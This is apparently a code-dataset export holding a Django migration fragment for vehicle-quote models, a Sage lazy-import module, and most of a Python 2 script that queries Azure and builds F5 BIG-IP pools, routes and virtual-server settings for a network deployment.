                ('deleted_on', models.DateTimeField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical quote vehicles',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalRequirementQuote',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('rate', models.CharField(max_length=15, null=True)),
                ('date', models.DateField(blank=True, null=True)),
                ('status', models.CharField(blank=True, max_length=15, null=True)),
                ('created_on', models.DateTimeField(blank=True, editable=False)),
                ('updated_on', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('deleted_on', models.DateTimeField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical requirement quote',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalRequirementVehicleQuote',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created_on', models.DateTimeField(blank=True, editable=False)),
                ('updated_on', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('deleted_on', models.DateTimeField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical requirement vehicle quote',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='QuoteVehicles',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('vehicle_no', models.CharField(max_length=20)),
                ('status', models.CharField(blank=True, max_length=15, null=True)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('updated_on', models.DateTimeField(auto_now=True)),
                ('deleted', models.BooleanField(default=False)),
                ('deleted_on', models.DateTimeField(blank=True, null=True)),
                ('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vehicle_quote_created_by', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='RequirementQuote',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('rate', models.CharField(max_length=15, null=True)),
                ('date', models.DateField(blank=True, null=True)),
                ('status', models.CharField(blank=True, max_length=15, null=True)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('updated_on', models.DateTimeField(auto_now=True)),
                ('deleted', models.BooleanField(default=False)),
                ('deleted_on', models.DateTimeField(blank=True, null=True)),
                ('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote_created_by', to=settings.AUTH_USER_MODEL)),
```
],
),
migrations.CreateModel(
name='RequirementVehicleQuote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_vehicle_quote_created_by', to=settings.AUTH_USER_MODEL)),
('quote_vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='requirement_vehicle_quote', to='fms.QuoteVehicles')),
('requirement', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote', to='fms.Requirement')),
],
),
migrations.AddField(
model_name='requirementquote',
name='requirement_vehicle_quote',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote', to='fms.RequirementVehicleQuote'),
),
migrations.AddField(
model_name='requirementquote',
name='supplier',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='supplier_quote', to='supplier.Supplier'),
),
migrations.AddField(
model_name='historicalrequirementvehiclequote',
name='quote_vehicle',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.QuoteVehicles'),
),
migrations.AddField(
model_name='historicalrequirementvehiclequote',
name='requirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.Requirement'),
),
migrations.AddField(
model_name='historicalrequirementquote',
name='requirement_vehicle_quote',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.RequirementVehicleQuote'),
),
migrations.AddField(
model_name='historicalrequirementquote',
name='supplier',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='supplier.Supplier'),
),
]
| 66.395062
| 189
| 0.63174
| 1,136
| 10,756
| 5.766725
| 0.09331
| 0.045184
| 0.05129
| 0.080598
| 0.909174
| 0.905969
| 0.872386
| 0.84552
| 0.84552
| 0.83056
| 0
| 0.007547
| 0.223875
| 10,756
| 161
| 190
| 66.807453
| 0.777192
| 0.004184
| 0
| 0.767742
| 1
| 0
| 0.166962
| 0.052386
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019355
| 0
| 0.03871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
|
990657e143b4f7c96515211fc09f2025c8718be9
| 98
|
py
|
Python
|
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
lazy_import('sage.manifolds.manifold', 'Manifold')
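# Illustrative usage (not part of the original file): lazy_import binds the
# name immediately but defers loading sage.manifolds.manifold until first use,
# e.g. M = Manifold(2, 'M') triggers the real import at call time.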
| 24.5
| 50
| 0.816327
| 14
| 98
| 5.5
| 0.5
| 0.38961
| 0.415584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 98
| 3
| 51
| 32.666667
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.319588
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
|
99099e1fca63771eb747518e9af35682d3e26888
| 53,364
|
py
|
Python
|
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | null | null | null |
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | 1
|
2019-03-29T11:52:48.000Z
|
2019-03-29T11:52:48.000Z
|
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | 1
|
2019-03-29T11:50:18.000Z
|
2019-03-29T11:50:18.000Z
|
#!/usr/bin/env python2
# NOTE: this script uses Python 2 syntax (bare "print" statements).
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.resource.resources.models import DeploymentMode
from msrestazure.azure_cloud import AZURE_US_GOV_CLOUD
from msrestazure.azure_cloud import AZURE_PUBLIC_CLOUD
import os
if os.environ.get("is_gov") == "1":
mycloud = AZURE_US_GOV_CLOUD
else:
mycloud = AZURE_PUBLIC_CLOUD
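# mycloud carries the per-cloud endpoint set; every management client below is
# built with base_url=mycloud.endpoints.resource_manager, so the same script
# targets Azure Government or public Azure depending on the is_gov env var.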
from optparse import OptionParser
parser = OptionParser()
parser.add_option('--action',help="external|internal|complete")
parser.add_option('--debug',action="store_true")
parser.add_option('--private',action="store_true")
(options, args) = parser.parse_args()
import pprint
import re
import sys
import json
import time
from netaddr import IPNetwork, IPAddress
USE_OMS = os.environ.get('use_oms','False') == 'True'
if os.path.exists('.use_oms'):
    USE_OMS = True
if USE_OMS:
LOG_PROFILE="OMS.app/OMS_remote_logging"
from azure.mgmt.loganalytics import LogAnalyticsManagementClient
else:
LOG_PROFILE="local-afm-log"
def get_ips(resource_group, instanceName):
vm = compute_client.virtual_machines.get(resource_group,instanceName , expand='instanceview')
vm_nic = vm.network_profile.network_interfaces[0].id.split('/')[-1]
vm_ip = IPAddress(network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].private_ip_address)
if network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address:
pip_name = network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address.id.split('/')[-1]
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
if pip.dns_settings:
return (vm_ip, IPAddress(pip.ip_address), pip.dns_settings.fqdn)
else:
return (vm_ip, IPAddress(pip.ip_address), None)
else:
return (vm_ip, None, None)
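# get_ips returns (private_ip, public_ip or None, fqdn or None) for NIC 0;
# get_ext_ips below does the same for NIC 1 but without the FQDN.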
def get_ext_ips(resource_group, instanceName):
vm = compute_client.virtual_machines.get(resource_group,instanceName , expand='instanceview')
vm_nic = vm.network_profile.network_interfaces[1].id.split('/')[-1]
vm_ip = IPAddress(network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].private_ip_address)
if network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address:
pip_name = network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address.id.split('/')[-1]
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
return (vm_ip, IPAddress(pip.ip_address))
else:
return (vm_ip, None)
#def enable_ip_forward(resource_group, instanceName):
def get_pip(resource_group, pip_name):
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
if pip.dns_settings:
return (IPAddress(pip.ip_address), pip.dns_settings.fqdn)
else:
return (IPAddress(pip.ip_address), None)
subnet_re = re.compile(r'/\d\d?$')
ipaddr_re = re.compile(r'\d+\.\d+\.\d+\.\d+')
subscription_id=os.environ['AZURE_SUBSCRIPTION_ID']
credentials = ServicePrincipalCredentials(
client_id=os.environ['AZURE_CLIENT_ID'],
secret=os.environ['AZURE_SECRET'],
tenant=os.environ['AZURE_TENANT'],
cloud_environment=mycloud
)
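# Service-principal auth from environment variables; passing cloud_environment
# keeps the token authority consistent with the chosen cloud's ARM endpoint.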
resource_group = os.environ['AZURE_RESOURCE_GROUP']
f5_ext_resource_group = "%s_F5_External" %(resource_group)
f5_int_resource_group = "%s_F5_Internal" %(resource_group)
resource_client = ResourceManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
compute_client = ComputeManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
network_client = NetworkManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
if USE_OMS:
loganalytics_client = LogAnalyticsManagementClient(credentials, subscription_id, base_url=mycloud.endpoints.resource_manager)
parameters = None
f5_password = os.environ['f5_password']
f5_unique_short_name = os.environ['f5_unique_short_name']
f5_unique_short_name2 = os.environ['f5_unique_short_name2']
f5_license_key_1 = os.environ['f5_license_key_1']
f5_license_key_2 = os.environ['f5_license_key_2']
f5_license_key_3 = os.environ['f5_license_key_3']
f5_license_key_4 = os.environ['f5_license_key_4']
client_id=os.environ['AZURE_CLIENT_ID']
client_secret=os.environ['AZURE_SECRET']
tenant_id=os.environ['AZURE_TENANT']
cloud_environment=mycloud
for deployment in resource_client.deployments.list_by_resource_group(resource_group):
# if deployment.name != 'Microsoft.Template':
# continue
# data = deployment.as_dict()
# print deployment.name
# print data
if "f5_Ext_Untrusted_SubnetName" not in deployment.properties.parameters.keys():
continue
parameters = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in parameters.items():
if v and subnet_re.search(v):
parameters[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
parameters[k] = IPAddress(v)
if options.debug:
pprint.pprint(parameters)
jumphost_ip = get_ips(resource_group, parameters['vdssJumpBoxName'])[0]
jumphostlinux_ip = get_ips(resource_group, parameters['vdssJumpBoxLinuxName'])[0]
mgmt_start_ip = IPAddress(parameters['management_SubnetPrefix'].first+10)
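# netaddr arithmetic: .first is the integer form of the network address, so
# with management_SubnetPrefix = 172.16.0.0/24 (see the sample values at the
# bottom of this file), .first + 10 yields IPAddress('172.16.0.10').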
#if not resource_client.resource_groups.check_existence(f5_ext_resource_group):
if options.action == "external":
ext_parameters = {
"adminUsername": parameters['vdssJumpBoxAdminUserName'],
"adminPassword": f5_password,
"dnsLabel": f5_unique_short_name,
"instanceName": f5_unique_short_name,
"imageName":"Best",
"licensedBandwidth":"25m-best-hourly",
"bigIpVersion":"latest",
"licenseKey1": f5_license_key_1,
"licenseKey2": f5_license_key_2,
"numberOfExternalIps": 0,
"vnetName": parameters['vnetName'],
"vnetResourceGroupName": resource_group,
"mgmtSubnetName": parameters['management_SubnetName'],
"mgmtIpAddressRangeStart": str(mgmt_start_ip + 1),
"externalSubnetName": parameters['f5_Ext_Untrusted_SubnetName'],
"externalIpSelfAddressRangeStart": str(parameters['f5_Ext_Untrusted_IP'] - 3),
"externalIpAddressRangeStart": str(parameters['f5_Ext_Untrusted_IP'] - 1),
"internalSubnetName": parameters['f5_Ext_Trusted_SubnetName'],
"internalIpAddressRangeStart": str(parameters['f5_Ext_Trusted_IP'] - 1),
"tenantId": tenant_id,
"clientId": client_id,
"servicePrincipalSecret": client_secret,
"managedRoutes": "0.0.0.0/0",
"routeTableTag": "%sRouteTag" %(f5_unique_short_name),
"ntpServer": "0.pool.ntp.org",
"timeZone": "UTC",
"restrictedSrcAddress": "*",
"allowUsageAnalytics": "No"
}
send_parameters = {k: {'value': v} for k, v in ext_parameters.items()}
print json.dumps(send_parameters)
sys.exit(0)
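# For --action external (and internal below) the script only emits deployment
# parameters: each value is wrapped as {"value": ...}, the shape an ARM
# template parameters payload expects, then exits.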
if options.action == "internal":
# deployment_properties)
int_parameters = {
"adminUsername": parameters['vdssJumpBoxAdminUserName'],
"adminPassword": f5_password,
"dnsLabel": f5_unique_short_name2,
"instanceName": f5_unique_short_name2,
"imageName":"Best",
"licensedBandwidth":"25m-best-hourly",
"bigIpVersion":"latest",
"licenseKey1": f5_license_key_3,
"licenseKey2": f5_license_key_4,
"numberOfExternalIps": 0,
"vnetName": parameters['vnetName'],
"vnetResourceGroupName": resource_group,
"mgmtSubnetName": parameters['management_SubnetName'],
"mgmtIpAddressRangeStart": str(mgmt_start_ip + 3),
"externalSubnetName": parameters['f5_Int_Untrusted_SubnetName'],
"externalIpSelfAddressRangeStart": str(parameters['f5_Int_Untrusted_IP'] - 3),
"externalIpAddressRangeStart": str(parameters['f5_Int_Untrusted_IP'] - 1),
"internalSubnetName": parameters['f5_Int_Trusted_SubnetName'],
"internalIpAddressRangeStart": str(parameters['f5_Int_Trusted_IP'] - 1),
"tenantId": tenant_id,
"clientId": client_id,
"servicePrincipalSecret": client_secret,
"managedRoutes": "0.0.0.0/0,%s,%s,%s,%s,10.0.0.0/22" %(str(parameters['management_SubnetPrefix']),
str(parameters['vdmS_SubnetPrefix']),
parameters['f5_Ext_Untrusted_SubnetPrefix'],
parameters['f5_Ext_Trusted_SubnetPrefix']),
"routeTableTag": "%sRouteTag" %(f5_unique_short_name2),
"ntpServer": "0.pool.ntp.org",
"timeZone": "UTC",
"restrictedSrcAddress": "*",
"allowUsageAnalytics": "No"
}
send_parameters = {k: {'value': v} for k, v in int_parameters.items()}
print json.dumps(send_parameters)
sys.exit(0)
f5_ext = None
waiting = True
while waiting:
for deployment in resource_client.deployments.list_by_resource_group(f5_ext_resource_group):
data = deployment.as_dict()
if 'externalIpSelfAddressRangeStart' not in deployment.properties.parameters:
continue
# print data['name']
# print data['properties']['provisioning_state']
# print data['properties'].keys()
# print deployment.properties.parameters
if data['properties']['provisioning_state'] == 'Running':
#if data['properties']['provisioning_state'] == 'Succeeded':
waiting = True
else:
waiting = False
f5_ext = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in f5_ext.items():
if not isinstance(v,str):
continue
if v and subnet_re.search(v):
f5_ext[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
f5_ext[k] = IPAddress(v)
if waiting:
# print 'waiting'
time.sleep(30)
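# This loop (and the matching one below for the internal resource group) polls
# every 30 s until the deployment's provisioning_state leaves 'Running', then
# snapshots its parameters, coercing subnet/IP strings as above.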
#pprint.pprint(f5_ext)
if options.debug:
pprint.pprint(f5_ext)
if not resource_client.resource_groups.check_existence(f5_int_resource_group):
sys.exit(0)
f5_int = None
waiting = True
while waiting:
for deployment in resource_client.deployments.list_by_resource_group(f5_int_resource_group):
if 'externalIpSelfAddressRangeStart' not in deployment.properties.parameters:
continue
data = deployment.as_dict()
if data['properties']['provisioning_state'] == 'Running':
#if data['properties']['provisioning_state'] == 'Succeeded':
waiting = True
else:
waiting = False
f5_int = dict([(x,deployment.properties.parameters[x].get('value')) for x in deployment.properties.parameters])
for (k,v) in f5_int.items():
if not isinstance(v,str):
continue
if v and subnet_re.search(v):
f5_int[k] = IPNetwork(v)
elif v and ipaddr_re.search(v):
f5_int[k] = IPAddress(v)
if waiting:
# print 'waiting'
time.sleep(30)
if options.debug:
pprint.pprint(f5_int)
#print "az vm show --name %s --resource-group \"%s\" -d --query \"privateIps\" -d" %(parameters['jumpBoxName'],resource_group)
vm = compute_client.virtual_machines.get(resource_group, parameters['vdssJumpBoxName'],expand='instanceview')
nic = vm.network_profile.network_interfaces[0].id.split('/')[-1]
jumphost_ip = IPAddress(network_client.network_interfaces.get(resource_group,nic).ip_configurations[0].private_ip_address)
(bigip_ext1_ip, bigip_ext1_pip, bigip_ext1_fqdn) = get_ips(f5_ext_resource_group, "%s-%s0" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext2_ip, bigip_ext2_pip, bigip_ext2_fqdn) = get_ips(f5_ext_resource_group, "%s-%s1" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
# no pip
if not bigip_ext1_pip:
bigip_ext1_pip = bigip_ext1_ip
if not bigip_ext2_pip:
bigip_ext2_pip = bigip_ext2_ip
(bigip_int1_ip, bigip_int1_pip, bigip_int1_fqdn) = get_ips(f5_int_resource_group, "%s-%s0" %(f5_int['dnsLabel'], f5_int['instanceName']))
(bigip_int2_ip, bigip_int2_pip, bigip_int2_fqdn) = get_ips(f5_int_resource_group, "%s-%s1" %(f5_int['dnsLabel'], f5_int['instanceName']))
if not bigip_int1_pip:
bigip_int1_pip = bigip_int1_ip
if not bigip_int2_pip:
bigip_int2_pip = bigip_int2_ip
(bigip_ext_ext1_ip, bigip_ext_ext1_pip) = get_ext_ips(f5_ext_resource_group, "%s-%s0" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext_ext2_ip, bigip_ext_ext2_pip) = get_ext_ips(f5_ext_resource_group, "%s-%s1" %(f5_ext['dnsLabel'], f5_ext['instanceName']))
(bigip_ext_int1_ip, bigip_ext_int1_pip) = get_ext_ips(f5_int_resource_group, "%s-%s0" %(f5_int['dnsLabel'], f5_int['instanceName']))
(bigip_ext_int2_ip, bigip_ext_int2_pip) = get_ext_ips(f5_int_resource_group, "%s-%s1" %(f5_int['dnsLabel'], f5_int['instanceName']))
#bigip_ext1 = IPAddress(parameters['management_SubnetPrefix'].first+10)
#bigip_ext2 = IPAddress(parameters['management_SubnetPrefix'].first+11)
#bigip_int1 = IPAddress(parameters['management_SubnetPrefix'].first+12)
#bigip_int2 = IPAddress(parameters['management_SubnetPrefix'].first+13)
external_pip = get_pip(resource_group, "f5-ext-pip0")
external_pip2 = get_pip(resource_group, "f5-ext-pip1")
#print external_pip
# add 2 for now, needs to be fixed
#external_vip = parameters['f5_Ext_Untrusted_IP']
external_vip = str(external_pip[0])
external_vip2 = str(external_pip2[0])
subnet = network_client.subnets.get(resource_group, str(f5_ext["vnetName"]), str(f5_ext["externalSubnetName"]))
internalsubnet = network_client.subnets.get(resource_group, str(f5_int["vnetName"]), str(f5_int["externalSubnetName"]))
#internal_vip = parameters['f5_Int_Untrusted_IP']
internal_ext_gw = IPAddress(parameters['f5_Int_Untrusted_SubnetPrefix'].first + 1)
output = {}
pools = []
pool_members = []
virtuals = []
if options.debug:
print "### EXTERNAL F5 ###"
print "# Routes"
print "create /net route mgmt network %s gw %s" %(parameters['management_SubnetPrefix'], IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1))
print "create /net route vdms network %s gw %s" %(parameters['vdmS_SubnetPrefix'], IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1))
print "# MGMT Hosts"
print "create /ltm pool jumpbox_rdp_pool members replace-all-with { %s:3389}" %(jumphost_ip)
print "create /ltm pool jumpbox_rdp_pool members replace-all-with { %s:22}" %(jumphostlinux_ip)
# print "create /ltm virtual jumpbox_rdp_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(external_vip)
print "create /ltm virtual jumpbox_rdp_local_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(bigip_ext_ext1_ip)
print "create /ltm virtual jumpbox_rdp_local_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap }" %(bigip_ext_ext2_ip)
print "create /ltm pool bigip_ext1_ssh_pool members replace-all-with { %s:22}" %(bigip_ext1_ip)
print "create /ltm pool bigip_ext2_ssh_pool members replace-all-with { %s:22}" %(bigip_ext2_ip)
print "create /ltm pool bigip_int1_ssh_pool members replace-all-with { %s:22}" %(bigip_int1_ip)
print "create /ltm pool bigip_int2_ssh_pool members replace-all-with { %s:22}" %(bigip_int2_ip)
routes= [{ 'name': 'mgmt',
'destination': str(parameters['management_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'vdms',
'destination': str(parameters['vdmS_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'internalvips',
'destination': str(parameters['f5_Int_Trusted_SubnetPrefix']),
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private10',
'destination': '10.0.0.0/8',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private172',
'destination': '172.16.0.0/12',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) },
{ 'name': 'private192',
'destination': '192.168.0.0/16',
'gateway_address': str(IPAddress(parameters['f5_Ext_Trusted_SubnetPrefix'].first+1)),
'server': str(bigip_ext1_pip) }
]
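# These static routes send management, VDMS and all RFC1918 space through the
# external BIG-IP's trusted-side gateway (first host of f5_Ext_Trusted).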
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_rdp_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_rdp_pool',
'host': str(jumphost_ip),
'name': str(jumphost_ip),
'port': '3389'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_rdp_gw_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_rdp_gw_pool',
'host': str(jumphost_ip),
'name': str(jumphost_ip),
'port': '443'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'jumpbox_ssh_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'jumpbox_ssh_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '22'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'http_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'http_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '80'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'https_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'https_pool',
'host': str(jumphostlinux_ip),
'name': str(jumphostlinux_ip),
'port': '443'})
pools.append({'server': str(bigip_ext1_pip),
'name': 'ssl_visible_http_pool',
'partition':'Common'})
pool_members.append({'server': str(bigip_ext1_pip),
'pool': 'ssl_visible_http_pool',
'host': str(parameters['f5_Int_Untrusted_IP']),
'name': str(parameters['f5_Int_Untrusted_IP']),
'port': '80'})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_rdp_vs',
'command': "create /ltm virtual jumpbox_rdp_vs destination %s:3389 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_ssh_vs',
'command': "create /ltm virtual jumpbox_ssh_vs destination %s:22 profiles replace-all-with { loose_fastL4 } pool jumpbox_ssh_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'jumpbox_rdp_gw_vs',
'command': "create /ltm virtual jumpbox_rdp_gw_vs destination %s:443 profiles replace-all-with { loose_fastL4 } pool jumpbox_rdp_gw_pool source-address-translation { type automap } fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'http_vs',
'command': "create /ltm virtual http_vs destination %s:80 profiles replace-all-with { http } pool http_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'ssl_visible_vs',
'command': "create /ltm virtual ssl_visible_vs destination %s:443 profiles replace-all-with { clientssl http } pool ssl_visible_http_pool fw-enforced-policy log_all_afm security-log-profiles replace-all-with { %s }" %(external_vip2, LOG_PROFILE)})
virtuals.append({'server': str(bigip_ext1_pip),
'name':'ssl_not_visible_vs',
